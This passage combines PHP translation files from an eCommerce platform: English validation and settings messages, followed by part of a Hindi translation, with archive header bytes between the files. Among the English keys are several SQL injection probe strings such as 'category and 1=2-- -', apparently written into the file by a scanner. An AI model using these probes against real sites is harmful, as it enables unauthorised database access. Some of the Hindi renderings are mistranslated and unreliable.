'If you enable this option cancellation policy page will be shown in the user app and website', 'if_you_disable_this_option_cancellation_policy_page_will_not_be_shown_in_the_user_app_and_website' => 'If you disable this option cancellation policy page will not be shown in the user app and website', 'about_us_updated_successfully' => 'About us updated successfully', 'help_topic_table' => 'Help topic table', 'edit_modal_help_topic' => 'Edit modal help topic', 'company_Reliability' => 'Company Reliability', 'if_enabled _the_delivery_info_will_be_available_on_the_system.' => 'If enabled the delivery info will be available on the system.', 'want_to_Turn_ON_the_delivery_info_option' => 'Want to Turn ON the delivery info option', 'want_to_Turn_OFF_the_delivery_info_option' => 'Want to Turn OFF the delivery info option', 'if_enabled_customers_can_see_delivery_info' => 'If enabled customers can see delivery info', 'if_disabled_the_delivery_info_will_be_hidden_from_customer' => 'If disabled the delivery info will be hidden from customer', 'upload_icon' => 'Upload icon', 'if_enabled _the_safe_payment_will_be_available_on_the_system.' => 'If enabled the safe payment will be available on the system.', 'want_to_Turn_ON_the_safe_payment_option' => 'Want to Turn ON the safe payment option', 'want_to_Turn_OFF_the_safe_payment_option' => 'Want to Turn OFF the safe payment option', 'if_enabled_customers_can_see_safe_payment' => 'If enabled customers can see safe payment', 'if_disabled_the_safe_payment_will_be_hidden_from_customer' => 'If disabled the safe payment will be hidden from customer', 'if_enabled _the_return_policy_will_be_available_on_the_system.' => 'If enabled the return policy will be available on the system.', 'want_to_Turn_ON_the_return_policy_option' => 'Want to Turn ON the return policy option', 'want_to_Turn_OFF_the_return_policy_option' => 'Want to Turn OFF the return policy option', 'if_enabled_customers_can_see_return_policy' => 'If enabled customers can see return policy', 'if_disabled_the_return_policy_will_be_hidden_from_customer' => 'If disabled the return policy will be hidden from customer', 'authentic_product' => 'Authentic product', 'if_enabled _the_authentic_product_will_be_available_on_the_system.' => 'If enabled the authentic product will be available on the system.', 'want_to_Turn_ON_the_authentic_product_option' => 'Want to Turn ON the authentic product option', 'want_to_Turn_OFF_the_authentic_product_option' => 'Want to Turn OFF the authentic product option', 'if_enabled_customers_can_see_authentic_product' => 'If enabled customers can see authentic product', 'if_disabled_the_authentic_product_will_be_hidden_from_customer' => 'If disabled the authentic product will be hidden from customer', 'search_by_vendor_info' => 'Search by vendor info', 'We_are_sorry_server_is_not_responding' => 'We are sorry server is not responding', 'Try_after_sometime' => 'Try after sometime', 'use_your_registered_email_address' => 'Use your registered email address', 'we_will_send_you_a_temporary_password_recovery_link_in_your_email' => 'We will send you a temporary password recovery link in your email', 'Click_the_recovery_link_to_change_your_password_on_our_secure_website' => 'Click the recovery link to change your password on our secure website', 'fill_in_your_email_address_below' => 'Fill in your email address below', 'we_will_send_email you a temporary code' => 'We will send email you a temporary code', 'use_the_code_to_change_your_password_on_our_secure_website' => 'Use the code to change your password on our secure website', 'password_reset_successfully' => 'Password reset successfully', 'a_password_reset_mail_has_sent_to_your_email' => 'A password reset mail has sent to your email', 'please_check_your_email' => 'Please check your email', 'Your_subscription_successfully_done' => 'Your subscription successfully done', 'ReCAPTCHA Failed!' => 'ReCAPTCHA Failed!', 'The phone number must be at least 4 characters' => 'The phone number must be at least 4 characters', 'The_phone_field_is_required' => 'The phone field is required', 'The_phone_number_has_already_been_taken' => 'The phone number has already been taken', 'The_email_field_is_required' => 'The email field is required', 'The_email_has_already_been_taken' => 'The email has already been taken', 'The_image_field_is_required' => 'The image field is required', 'The_password_and_confirm_password_must_match' => 'The password and confirm password must match', 'The_shop_name_field_is_required' => 'The shop name field is required', 'The_shop_address_field_is_required' => 'The shop address field is required', 'The_logo_type_must_be' => 'The logo type must be', 'The_banner_type_must_be' => 'The banner type must be', 'The image type must be.jpg .png .jpeg .gif .bmp .tif .tiff .webp' => 'The image type must be.jpg .png .jpeg .gif .bmp .tif .tiff .webp', 'The logo type must be.jpg .png .jpeg .gif .bmp .tif .tiff .webp' => 'The logo type must be.jpg .png .jpeg .gif .bmp .tif .tiff .webp', 'The banner type must be.jpg .png .jpeg .gif .bmp .tif .tiff .webp' => 'The banner type must be.jpg .png .jpeg .gif .bmp .tif .tiff .webp', 'No_such_user_found' => 'No such user found', 'identity_is_required' => 'Identity is required', 'no_such_user_found' => 'No such user found', '_have_positive_reviews_&_ratings_and_in_alphabetical_order' => ' have positive reviews & ratings and in alphabetical order', 'if_enabled_customers_must_order_over_the_minimum_amount_of_orders_that_admin_or_vendors_set' => 'If enabled customers must order over the minimum amount of orders that admin or vendors set', 'The_minimum_add_fund_amount_must_be_at_least_1' => 'The minimum add fund amount must be at least 1', 'if_both_features_are_disabled _then_all_places_will_be_available_as_delivery_area' => 'If both features are disabled then all places will be available as delivery area', 'not_seen_yet' => 'Not seen yet', 'the_link_field_is_required' => 'The link field is required', 'name_already_used' => 'Name already used', 'the_name_field_is_required' => 'The name field is required', 'admin_password_updated_successfully' => 'Admin password updated successfully', 'Brand is required!' => 'Brand is required!', 'please_update_their_brand_from_the_below_list_before_deleting_this_one' => 'Please update their brand from the below list before deleting this one', 'no_sub_category_found' => 'No sub category found', 'search_by_sub_category_name' => 'Search by sub category name', 'Main_Category_is_required' => 'Main Category is required', 'Proceed_to_Checkout' => 'Proceed to Checkout', 'Choose_Shipping_Method' => 'Choose Shipping Method', 'Please_select_shipping_method' => 'Please select shipping method', 'Order_Placed_Successfully' => 'Order Placed Successfully', 'Store_not_found' => 'Store not found', 'currently_sorting_this_section_based_on_first_created_products' => 'Currently sorting this section based on first created products', 'Product_is_required' => 'Product is required', 'deal_added_successfully' => 'Deal added successfully', 'want_to_Turn_ON_Deal_of_the_Day_Status' => 'Want to Turn ON Deal of the Day Status', 'want_to_Turn_OFF_Deal_of_the_Day_Status' => 'Want to Turn OFF Deal of the Day Status', 'product_priority_Setup' => 'Product priority Setup', 'priority_settings' => 'Priority settings', 'no_coupon_found' => 'No coupon found', 'search_by_brand_name' => 'Search by brand name', '_products_under_this_brand' => ' products under this brand', 'new_arrival_products' => 'New arrival products', 'these_new_arrival_products_are_items_recently_added_to_the_list_within_a_specific_time_frame_and_have_positive_reviews_&_ratings' => 'These new arrival products are items recently added to the list within a specific time frame and have positive reviews & ratings', 'set_duration' => 'Set duration', 'products_are_considered_as' => 'Products are considered as', 'if_it_is_added_with_in' => 'If it is added with in', 'months)' => 'Months)', 'Month' => 'Month', 'the_commission_field_is_required' => 'The commission field is required', 'The_add_fund_bonus_must_be_a_numeric_value' => 'The add fund bonus must be a numeric value', 'The_add_fund_bonus_cannot_exceed_100' => 'The add fund bonus cannot exceed 100', 'The_add_fund_bonus_must_be_at_least_0' => 'The add fund bonus must be at least 0', 'The_loyalty_point_exchange_rate_must_be_a_numeric_value' => 'The loyalty point exchange rate must be a numeric value', 'The_loyalty_point_exchange_rate_must_be_at_least_1' => 'The loyalty point exchange rate must be at least 1', 'The_referral_earning_exchange_rate_must_be_a_numeric_value' => 'The referral earning exchange rate must be a numeric value', 'The_referral_earning_exchange_rate_must_be_at_least_0' => 'The referral earning exchange rate must be at least 0', 'The_maximum_add_fund_amount_must_be_a_numeric_value' => 'The maximum add fund amount must be a numeric value', 'The_maximum_add_fund_amount_must_be_at_least_0' => 'The maximum add fund amount must be at least 0', 'The_minimum_add_fund_amount_must_be_a_numeric_value' => 'The minimum add fund amount must be a numeric value', 'order_delivery_verification' => 'Order delivery verification', 'if_enabled_customers_must_place_at_least_or_more_than_the_order_amount_that_admin_or_vendors_set' => 'If enabled customers must place at least or more than the order amount that admin or vendors set', 'if_enabled _you_can_choose_one_or_multiple_countries_for_product_delivery' => 'If enabled you can choose one or multiple countries for product delivery', 'if_enabled_the_admin_or_vendor_can_deliver_orders_to_the_selected_countries' => 'If enabled the admin or vendor can deliver orders to the selected countries', 'if_disabled_there_will_be_no_delivery_restrictions_for_admin_or_vendors' => 'If disabled there will be no delivery restrictions for admin or vendors', 'if_enabled _the_zip_code_areas_will_be_available_for_delivery' => 'If enabled the zip code areas will be available for delivery', 'Please_Note' => 'Please Note', 'If_you_don’t_enter_a_specific_zip_code_from_a_country _that_area_won’t_be_available_for_delivery' => 'If you don’t enter a specific zip code from a country that area won’t be available for delivery', 'run_eCommerce_business_in_your_country_and_beyond' => 'Run eCommerce business in your country and beyond', 'how_does_it_work' => 'How does it work', 'enable' => 'Enable', 'Delivery_Available_Country' => 'Delivery Available Country', 'if_you_want_to_run_your_business_in_a_specific_country' => 'If you want to run your business in a specific country', 'choose_Country' => 'Choose Country', 'Delivery_Available_Zip_Code_Area' => 'Delivery Available Zip Code Area', 'Enter_Zip_Code' => 'Enter Zip Code', 'of_the_country_you’ve_selected' => 'Of the country you’ve selected', 'the_country_code_field_is_required' => 'The country code field is required', 'want_check_this_message' => 'Want check this message', 'You_already_subscribed_this_site' => 'You already subscribed this site', 'Phone number is required' => 'Phone number is required', 'The phone field is required' => 'The phone field is required', 'by_Turning_OFF_Cookie_Settings' => 'By Turning OFF Cookie Settings', 'by_Turning_ON_Cookie_Settings' => 'By Turning ON Cookie Settings', 'if_you_disable_it_customers_cannot_see_Cookie_Settings_in_frontend' => 'If you disable it customers cannot see Cookie Settings in frontend', 'email templates' => 'Email templates', 'notification message...' => 'Notification message...', 'vendor registration ...' => 'Vendor registration ...', 'mail_sent_successfully' => 'Mail sent successfully', 'credentials does not match or your account has been suspended' => 'Credentials does not match or your account has been suspended', 'upload_successfully' => 'Upload successfully', 'Riad_Uddin' => 'Riad Uddin', 'Test' => 'Test', 'no_vendor_found' => 'No vendor found', 'The banner field is required.' => 'The banner field is required.', 'Vendor_Registration_Successfully_Completed' => 'Vendor Registration Successfully Completed', 'want_to_reject_this_vendor' => 'Want to reject this vendor', 'want_to_approve_this_vendor' => 'Want to approve this vendor', 'Vendor_has_been_approved_successfully' => 'Vendor has been approved successfully', 'Vendor_Registration_Approved' => 'Vendor Registration Approved', 'The_brand_has_already_been_taken' => 'The brand has already been taken', 'brand_added_successfully' => 'Brand added successfully', 'product_request_approved' => 'Product request approved', 'brand_Update' => 'Brand Update', 'brand_updated_successfully' => 'Brand updated successfully', 'Shipping_Not_Available_for_this_Shop' => 'Shipping Not Available for this Shop', 'the_title_field_is_required' => 'The title field is required', 'the_duration_field_is_required' => 'The duration field is required', 'the_cost_must_be_a_number' => 'The cost must be a number', '4FOITO' => '4FOITO', 'delivery_Address' => 'Delivery Address', 'new_order_received' => 'New order received', 'add_New_Ticket' => 'Add New Ticket', 'the_point_field_is_required' => 'The point field is required', 'the_point_field_must_be_an_integer' => 'The point field must be an integer', 'the_point_field_must_be_at_least_one' => 'The point field must be at least one', 'exchange_requirements_not_matched' => 'Exchange requirements not matched', 'no_Payment_Methods_Gateway_found' => 'No Payment Methods Gateway found', 'your_current_payment_settings_are_disabled because_you_have_enabled_payment_gateway_addon' => 'Your current payment settings are disabled because you have enabled payment gateway addon', 'To_visit_your_currently_active_payment_gateway_settings_please_follow_the_link' => 'To visit your currently active payment gateway settings please follow the link', 'latest ' => 'Latest ', 'latest _' => 'Latest ', 'First name is required' => 'First name is required', 'The first name field is required' => 'The first name field is required', 'The email field is required' => 'The email field is required', 'The image field is required' => 'The image field is required', 'The password field is required' => 'The password field is required', 'The shop name field is required' => 'The shop name field is required', 'The shop address field is required' => 'The shop address field is required', 'The logo field is required.' => 'The logo field is required.', 'category ' => 'Category ', 'category and 1=2' => 'Category and 1=2', 'category or (1=2) and a = a' => 'Category or (1=2) and a = a', 'category and 1=2#' => 'Category and 1=2#', 'category and 1=2#' => 'Category and 1=2#', 'category and 1=2-- -' => 'Category and 1=2-- -', 'category and 1=2-- -' => 'Category and 1=2-- -', 'category or(1=2)-- -' => 'Category or(1=2)-- -', 'category or(1=2)#' => 'Category or(1=2)#', 'category and 1=2 and a = a' => 'Category and 1=2 and a = a', 'category% and 1=2 and % = ' => 'Category% and 1=2 and % = ', 'category ) and 1=2 and ( 1 = 1' => 'Category ) and 1=2 and ( 1 = 1', 'category) or(1=2)-- -' => 'Category) or(1=2)-- -', 'category ) or(1=2)#' => 'Category ) or(1=2)#', 'category) and 1=2-- -' => 'Category) and 1=2-- -', 'category ) and 1=2#' => 'Category ) and 1=2#', 'category) and 1=2 and (2=2' => 'Category) and 1=2 and (2=2', 'category ) as tempxtestxtable where 1=2-- -' => 'Category ) as tempxtestxtable where 1=2-- -', 'Email already has been taken' => 'Email already has been taken', 'The_ticket_subject_is_required' => 'The ticket subject is required', 'The_ticket_type_is_required' => 'The ticket type is required', 'The_ticket_priority_is_required' => 'The ticket priority is required', 'Either_a_ticket_description_or_an_image_is_required' => 'Either a ticket description or an image is required', 'The_file_must_be_an_image' => 'The file must be an image', 'The_file_must_be_of_type:_jpeg _png _jpg _gif' => 'The file must be of type: jpeg png jpg gif', 'The_image_must_not_exceed_6_MB' => 'The image must not exceed 6 MB', 'submission_date' => 'Submission date', );PK ! �!(( ( en/message.phpnu �[��� <?php return [ 'Action' => '', ]; PK ! M}P�� � in/messages.phpnu �[��� <?php return array ( '24/7_Support_Center' => '24/7 समर्थन केंद्र', '3rd_party' => 'तीसरी पार्टी', '4 star' => '4 स्टार', '4 to 6 days' => '4 से 6 दिन', '4_to_6_days' => '4 से 6 दिन', '5 star' => '5 सितारा', '7 Days Return Policy' => '7 दिन की वापसी नीति', '7_Days_Return_Policy' => '7 दिन की वापसी नीति', '8+_Character' => '8+ चरित्र', '8+_characters_required' => '8+ वर्णों की आवश्यकता है', 'A-Z' => 'ए-जेड', 'A/C_No' => 'ए/सी नहीं', 'ADD URI' => 'उरी जोड़ें', 'ADDRESSES' => 'पतों', 'ADD_URI' => 'उरी जोड़ें', 'APP_DEBUG' => 'ऐप डिबग', 'APP_MODE' => 'ऐप मोड', 'APP_NAME' => 'एप्लिकेशन का नाम', 'APP_URL' => 'अनुप्रयोग url', 'ARRIVALS' => 'आगमन', 'ASE/DESC' => 'Ase/desc', 'AVC' => 'एवीसी', 'A_Z' => 'एक जेड', 'A_to_Z' => 'A से Z', 'A_to_Z_Order' => 'A to z ऑर्डर', 'Abc' => 'एबीसी', 'About Company' => 'कम्पनी के बारे में', 'About Our Company' => 'हमारी कंपनी के बारे में', 'About Us' => 'हमारे बारे में', 'About_Company' => 'कम्पनी के बारे में', 'About_Our_Company' => 'हमारी कंपनी के बारे में', 'About_Us' => 'हमारे बारे में', 'About_us' => 'हमारे बारे में', 'Accept the reCAPTCHA Terms of Service' => 'सेवा की recaptcha शर्तों को स्वीकार करें', 'Accept_All_Cookies' => 'सभी कुकीज़ स्वीकार करें', 'Account' => 'खाता', 'Account Name' => 'खाता नाम', 'Account No' => 'खाता नंबर', 'Account _number' => 'खाता संख्या', 'Account_Information' => 'खाता संबंधी जानकारी', 'Account_Number' => 'खाता संख्या', 'Accounts' => 'हिसाब किताब', 'Action' => 'कार्रवाई', 'Activate' => 'सक्रिय', 'Active' => 'सक्रिय', 'Active Product' => 'सक्रिय उत्पाद', 'Active_Products' => 'सक्रिय उत्पाद', 'Add' => 'जोड़ना', 'Add Help Topic' => 'सहायता विषय जोड़ें', 'Add New Currency' => 'नई मुद्रा जोड़ें', 'Add Product' => 'उत्पाद जोड़ें', 'Add Shipping' => 'शिपिंग जोड़ें', 'Add a ' => 'एक जोड़ना', 'Add new' => 'नया जोड़ो', 'Add new delivery-man' => 'नई डिलीवरी-मैन जोड़ें', 'Add new notification' => 'नई अधिसूचना जोड़ें', 'Add new product' => 'नया उत्पाद जोड़ें', 'Add_Address' => 'पता जोड़ें', 'Add_Domain_(For_ex=>_demo.6amtech.com)' => 'डोमेन जोड़ें (पूर्व के लिए=> demo.6amtech.com)', 'Add_Fields' => 'फ़ील्ड जोड़ें', 'Add_New' => 'नया जोड़ो', 'Add_New_Card' => 'नया कार्ड जोड़ें', 'Add_New_Employee' => 'नया कर्मचारी जोड़ें', 'Add_New_Field' => 'नया फ़ील्ड जोड़ें', 'Add_New_Product' => 'नया उत्पाद जोड़ें', 'Add_New_Seller' => 'नया विक्रेता जोड़ें', 'Add_Product' => 'उत्पाद जोड़ें', 'Add_a _abel_(Ex=>_abc_company)' => 'एक हाबिल जोड़ें (Ex=> ABC कंपनी)', 'Add_dynamic_url_to_secure_admin_login_access.' => 'एडमिन लॉगिन एक्सेस को सुरक्षित करने के लिए डायनेमिक URL जोड़ें।', 'Add_dynamic_url_to_secure_employee_login_access.' => 'कर्मचारी लॉगिन एक्सेस को सुरक्षित करने के लिए डायनामिक URL जोड़ें।', 'Add_fields' => 'फ़ील्ड जोड़ें', 'Add_method' => 'विधि जोड़ें', 'Add_new' => 'नया जोड़ो', 'Add_new_product' => 'नया उत्पाद जोड़ें', 'Add_to_cart' => 'कार्ट में जोड़ें', 'Address' => 'पता', 'Address Update Successfully' => 'पता अद्यतन सफलतापूर्वक', 'Address_Type' => 'पता मुद्रलेख', 'Addresses' => 'पतों', 'Admin' => 'व्यवस्थापक', 'Admin Shop Banner' => 'व्यवस्थापक दुकान बैनर', 'Admin | Login' => 'व्यवस्थापक | लॉग इन करें', 'Admin_Commission' => 'व्यवस्थापक आयोग', 'Admin_Discount' => 'व्यवस्थापक छूट', 'Admin_Earning' => 'व्यवस्थापक कमाई', 'Admin_Earning_Report' => 'व्यवस्थापक अर्जित रिपोर्ट', 'Admin_Net_Income' => 'शुद्ध आय', 'Air Conditioner' => 'एयर कंडीशनर', 'All' => 'सभी', 'All Brands Page' => 'सभी ब्रांड पेज', 'All Categories' => 'सब वर्ग', 'All Category Page' => 'सभी श्रेणी पृष्ठ', 'All Seller Page' => 'सभी विक्रेता पृष्ठ', 'All input field is required' => 'सभी इनपुट फ़ील्ड की आवश्यकता है', 'All input field required' => 'सभी इनपुट फ़ील्ड की आवश्यकता है', 'All_Brand' => 'सभी ब्रांड', 'All_Brands' => 'सभी ब्रांडों', 'All_Brands_Page' => 'सभी ब्रांड पेज', 'All_Cart_Product_List' => 'सभी कार्ट उत्पाद सूची', 'All_Categories' => 'सब वर्ग', 'All_Order_List' => 'सभी आदेश सूची', 'All_Pages_Banner' => 'सभी पृष्ठ बैनर', 'All_Pages_Banner ' => 'सभी पृष्ठ बैनर', 'All_Priority' => 'सभी प्राथमिकता', 'All_Product' => 'सभी उत्पाद', 'All_Products' => 'सभी प्रोडक्ट', 'All_Seller_Page' => 'सभी विक्रेता पृष्ठ', 'All_Sellers' => 'सभी विक्रेता', 'All_Shops' => 'सभी दुकानें', 'All_Status' => 'सभी स्थिति', 'All_Stores' => 'सभी भंडार', 'All_Wishing_Product_List' => 'सभी इच्छा उत्पाद सूची', 'All_copy_right_reserved_©_2023_' => 'सभी कॉपी राइट आरक्षित  © 2023', 'All_products' => 'सभी प्रोडक्ट', 'Already Withdrawn' => 'पहले से ही वापस ले लिया गया', 'Already in your wishlist' => 'पहले से ही आपकी इच्छा सूची में', 'Already_Settled' => 'पहले से ही व्यवस्थित', 'Already_Withdrawn' => 'पहले से ही वापस ले लिया गया', 'Already_have_store' => 'पहले से ही स्टोर है', 'Already_have_store ' => 'पहले से ही स्टोर है', 'Admin_also_reward_their_top_customers_with_wallet_money' => 'अमीन भी अपने शीर्ष ग्राहकों को बटुए के पैसे के साथ पुरस्कृत करें', 'Amount' => 'मात्रा', 'An' => 'एक', 'An_OTP_(One_Time_Password)_has_been_sent_to' => 'एक ओटीपी (एक समय पासवर्ड) भेजा गया है', 'An_OTP_(One_Time_Password)_has_been_sent_to_your_email' => 'एक OTP (वन टाइम पासवर्ड) आपके ईमेल पर भेजा गया है', 'Analysis' => 'विश्लेषण', 'Analytic_Script' => 'विश्लेषणात्मक स्क्रिप्ट', 'Analytics' => 'एनालिटिक्स', 'Another' => 'एक और', 'Another_Address' => 'एक और पता', 'Answer' => 'उत्तर', 'App_Logo' => 'ऐप लोगो', 'App_Settings' => 'एप्लिकेशन सेटिंग', 'Application' => 'आवेदन', 'Application System' => 'आवेदन का तरीका', 'Applications' => 'अनुप्रयोग', 'Apply' => 'आवेदन करना', 'Apply_Coupon_Code' => 'कूपन कोड लागू करें', 'Approve' => 'मंज़ूरी देना', 'Approved' => 'अनुमत', 'Are you sure' => 'क्या आपको यकीन है', 'Are you sure ' => 'क्या आपको यकीन है', 'Are you sure Change this' => 'क्या आपको यकीन है कि इसे बदलें', 'Are you sure Change this ' => 'क्या आपको यकीन है कि इसे बदलें', 'Are you sure delete this' => 'क्या आपको यकीन है कि इसे हटा दें', 'Are you sure delete this ' => 'क्या आपको यकीन है कि इसे हटा दें', 'Are you sure delete this ' => 'क्या आपको यकीन है कि इसे हटा दें', 'Are you sure delete this FAQ' => 'क्या आप निश्चित हैं कि इस FAQ को हटा दें', 'Are you sure delete this social media' => 'क्या आप निश्चित हैं कि इस सोशल मीडिया को हटा दें', 'Are you sure to delete this' => 'क्या आप इसे हटाने के लिए सुनिश्चित हैं', 'Are you sure to delete this ' => 'क्या आप इसे हटाने के लिए सुनिश्चित हैं', 'Are you sure you want to Delete' => 'क्या आप आश्वस्त है कि आपको डिलीट करना है', 'Are_you_sure' => 'क्या आपको यकीन है', 'Are_you_sure ' => 'क्या आपको यकीन है', 'Are_you_sure_delete_this' => 'क्या आपको यकीन है कि इसे हटा दें', 'Are_you_sure_delete_this_banner' => 'क्या आपको यकीन है कि इस बैनर को हटा दें', 'Are_you_sure_delete_this_brand' => 'क्या आपको यकीन है कि इस ब्रांड को हटा दें', 'Are_you_sure_delete_this_role' => 'क्या आप निश्चित हैं कि इस भूमिका को हटा दें', 'Are_you_sure_remove_this_product' => 'क्या आप सुनिश्चित हैं कि इस उत्पाद को हटा दें', 'Are_you_sure_to_delete_this' => 'क्या आप इसे हटाने के लिए सुनिश्चित हैं', 'Are_you_sure_to_delete_this ' => 'क्या आप इसे हटाने के लिए सुनिश्चित हैं', 'Are_you_sure_to_delete_this_sub_category' => 'क्या आप इस उप श्रेणी को हटाना सुनिश्चित कर रहे हैं', 'Aready_Withdrawn' => 'Aready वापस ले लिया', 'Arkohub' => 'अर्कोहूब', 'Asc/Dsc' => 'ASC/DSC', 'Ask_about_this_product' => 'इस उत्पाद के बारे में पूछें', 'Attachment' => 'लगाव', 'Attribute' => 'गुण', 'Attribute_Name' => 'उत्तरदायी ठहराने के लिए नाम', 'Attribute_Setup' => 'विशेषता सेटअप', 'Attribute_deleted_successfully' => 'विशेषता सफलतापूर्वक हटा दी गई', 'Attributes' => 'गुण', 'Audio' => 'ऑडियो', 'AuthKey_KeyID.p8' => 'Authkey keyid.p8', 'Authentic_Product' => 'प्रामाणिक उत्पाद', 'Authentic_Products' => 'प्रामाणिक उत्पाद', 'Authentication' => 'प्रमाणीकरण', 'Authorized redirect URIs' => 'अधिकृत पुनर्निर्देशित उरिस', 'Available color' => 'उपलब्ध रंग', 'Available_Color' => 'उपलब्ध रंग', 'Average' => 'औसत', 'Average Product Value' => 'औसत उत्पाद मूल्य', 'Average Ratings' => 'औसत रेटिंग', 'Average_Earning_Value' => 'औसत अर्जित मूल्य', 'Average_Product_Value' => 'औसत उत्पाद मूल्य', 'Average_Ratings' => 'औसत रेटिंग', 'Average_Sales_Value' => 'औसत बिक्री मूल्य', 'Axxelus' => 'एक्सक्सेलस', 'B. Store' => 'बी। स्टोर', 'B. Technology' => 'बी। प्रौद्योगिकी', 'BUYER_USERNAME' => 'खरीदार उपयोगकर्ता नाम', 'Back' => 'पीछे', 'Back to Shipping' => 'शिपिंग के लिए वापस', 'Back_Again' => 'फिर से वापस', 'Back_to_seller_list' => 'वापस विक्रेता सूची में', 'Background Music for commercial use' => 'व्यावसायिक उपयोग के लिए पृष्ठभूमि संगीत', 'Bags & Shoes' => 'बैग और जूते', 'Bank Info' => 'बैंक जानकारी', 'Bank Info View' => 'बैंक जानकारी दृश्य', 'Bank Information' => 'बैंक संबंधी जानकारी', 'Bank Name' => 'बैंक का नाम', 'Bank info' => 'बैंक जानकारी', 'Bank_Name' => 'बैंक का नाम', 'Banner' => 'बैनर', 'Banner About Us' => 'हमारे बारे में बैनर', 'Banner Cancellation Policy' => 'बैनर रद्दीकरण नीति', 'Banner Faq Page' => 'बैनर प्रश्न पृष्ठ', 'Banner Privacy Policy' => 'बैनर गोपनीयता नीति', 'Banner Product List Page' => 'Banner Product List Page', 'Banner Refund Policy' => 'बैनर रिफंड पॉलिसी', 'Banner Return Policy' => 'बैनर वापसी नीति', 'Banner Terms Conditions' => 'बैनर शर्तों की शर्तें', 'Banner_deleted_successfully' => 'बैनर को सफलतापूर्वक हटा दिया गया', 'Banner_published_successfully' => 'बैनर को सफलतापूर्वक प्रकाशित किया गया', 'Banner_unpublished_successfully' => 'बैनर अप्रकाशित सफलतापूर्वक', 'Banners' => 'बैनर', 'Base URL of the site ex=>' => 'साइट का आधार url पूर्व=>', 'Basic' => 'बुनियादी', 'Bazaar' => 'बाज़ार', 'Be careful before you turn on/off maintenance mode' => 'रखरखाव मोड को चालू/बंद करने से पहले सावधान रहें', 'Be_the_first_one_to_know_about_discounts' => 'छूट के बारे में जानने वाले पहले व्यक्ति हो', 'Beauty Health & Hair' => 'सौंदर्य स्वास्थ्य और बाल', 'Becareful before change the mode' => 'मोड को बदलने से पहले becareful', 'Becareful for change the mode' => 'मोड को बदलने के लिए becareful', 'Become a' => 'बनें एक', 'Become a Delivery Man' => 'डिलीवरी मैन बनें', 'Become_a' => 'बनें एक', 'Become_a_Delivery_Man' => 'डिलीवरी मैन बनें', 'Become_a_Seller' => 'विक्रेता बनें', 'Before delivered you need to make payment status paid!' => 'वितरित करने से पहले आपको भुगतान की स्थिति का भुगतान करने की आवश्यकता है!', 'Below Average' => 'औसत से कम', 'Best_Selling' => 'सर्वश्रेष्ठ बिक्री', 'Best_Sellings' => 'सर्वश्रेष्ठ विक्रय', 'Bicycle Shop' => 'साइकल की दुकान', 'Billing_Address' => 'बिल भेजने का पता', 'Billing_Section' => 'बिलिंग अनुभाग', 'Billing_address' => 'बिल भेजने का पता', 'Biography' => 'जीवनी', 'Blog' => 'ब्लॉग', 'Bluetooth Speaker' => 'ब्लूटूथ स्पीकर', 'Bottom' => 'तल', 'Branch' => 'शाखा', 'Branch_Name' => 'शाखा का नाम', 'Brand' => 'ब्रांड', 'Brand Add' => 'ब्रांड ऐड', 'Brand Edit' => 'ब्रांड संपादित करना', 'Brand List' => 'ब्रांड सूची', 'Brand_Logo' => 'ब्रांड लोगो', 'Brand_Name' => 'ब्रांड का नाम', 'Brand_deleted_successfully' => 'ब्रांड सफलतापूर्वक हटा दिया गया', 'Brand_update' => 'ब्रांड अद्यतन', 'Brands' => 'ब्रांड्स', 'Business Setup' => 'व्यापारिक प्रकोष्ठ', 'Business_Section' => 'व्यापार अनुभाग', 'Business_Settings' => 'व्यापारिक सेटिंग्स', 'Business_Setup' => 'व्यापारिक प्रकोष्ठ', 'Business_mode' => 'व्यवसाय विधा', 'Button_Text' => 'टेक्स्ट बटन', 'Buy_Now' => 'अभी खरीदें', 'By_Review_Rating' => 'समीक्षा रेटिंग द्वारा', 'By_clicking_sign_up_you_are_agreed_with_our ' => 'साइन अप पर क्लिक करके आप हमारे साथ सहमत हैं', 'Cable & Converters' => 'केबल और कन्वर्टर्स', 'Callback URI' => 'कॉलबैक उरी', 'Callback_URI' => 'कॉलबैक उरी', 'Callback_url' => 'कॉलबैक यूआरएल', 'Camera Accessories' => 'कैमरा सहायक उपकरण', 'Cancel' => 'रद्द करना', 'Cancel_Order' => 'आदेश रद्द', 'Cancel_order' => 'आदेश रद्द', 'Canceled' => 'रद्द', 'Canceled_Orders' => 'रद्द आदेश', 'Cancellation Policy' => 'रद्द करने की नीति', 'Cancellation_Policy' => 'रद्द करने की नीति', 'Cancelled' => 'रद्द', 'Captcha Failed' => 'कैप्चा विफल', 'Captcha_Failed.' => 'कैप्चा विफल।', 'Card' => 'कार्ड', 'Cart' => 'कार्ट', 'Cart key or ID is required!' => 'कार्ट कुंजी या आईडी की आवश्यकता है!', 'Cart_List' => 'कार्ट सूची', 'Cash Payments' => 'नकद भुगतान', 'Cash Payments ' => 'नकद भुगतान', 'Cash_ Payments' => 'नकद भुगतान', 'Cash_On_Delivery' => 'डिलवरी पर नकदी', 'Cash_Payment' => 'नकद भुगतान', 'Cash_Payments' => 'नकद भुगतान', 'Cash_on_Delivery' => 'डिलवरी पर नकदी', 'Categories' => 'श्रेणियाँ', 'Category' => 'वर्ग', 'Category Logo' => 'श्रेणी का लोगो', 'Category deleted Successfully.' => 'श्रेणी सफलतापूर्वक हटा दी गई।', 'Category_Logo' => 'श्रेणी का लोगो', 'Category_Name' => 'श्रेणी नाम', 'Category_Setup' => 'श्रेणी सेटअप', 'Category_cost_successfully_updated' => 'श्रेणी लागत सफलतापूर्वक अद्यतन की गई', 'Category_deleted_Successfully.' => 'श्रेणी सफलतापूर्वक हटा दी गई।', 'Category_tag' => 'श्रेणी का टैग', 'Central Air Conditioner.' => 'केंद्रीय एयर कंडीशनर।', 'Centre Point' => 'केंद्र बिंदु', 'Change' => 'परिवर्तन', 'Change status to paid' => 'भुगतान की स्थिति बदलें', 'Charger' => 'अभियोक्ता', 'Chat' => 'बात करना', 'Chat with seller' => 'विक्रेता के साथ चैट करें', 'Chat_with_Delivery_man' => 'डिलीवरी मैन के साथ चैट करें', 'Chat_with_Seller' => 'विक्रेता के साथ चैट करें', 'Chat_with_delivery' => 'प्रसव के साथ चैट करें', 'Chat_with_deliveryman' => 'डिलीवरीमैन के साथ चैट करें', 'Chat_with_seller' => 'विक्रेता के साथ चैट करें', 'Chatting List' => 'चैटिंग सूची', 'Chatting Page' => 'चैटिंग पेज', 'Chatting_List' => 'चैटिंग सूची', 'Check in ' => 'चेक इन', 'Check_Status' => 'स्थिति जाँचिए', 'Check_in_âAccept_the_reCAPTCHA_Terms_of_Serviceâ' => ' में जाँच करें सेवा के recaptcha शर्तों को स्वीकार करें', 'Check_now' => 'अब जांचें', 'Checkout' => 'चेक आउट', 'Choice Title' => 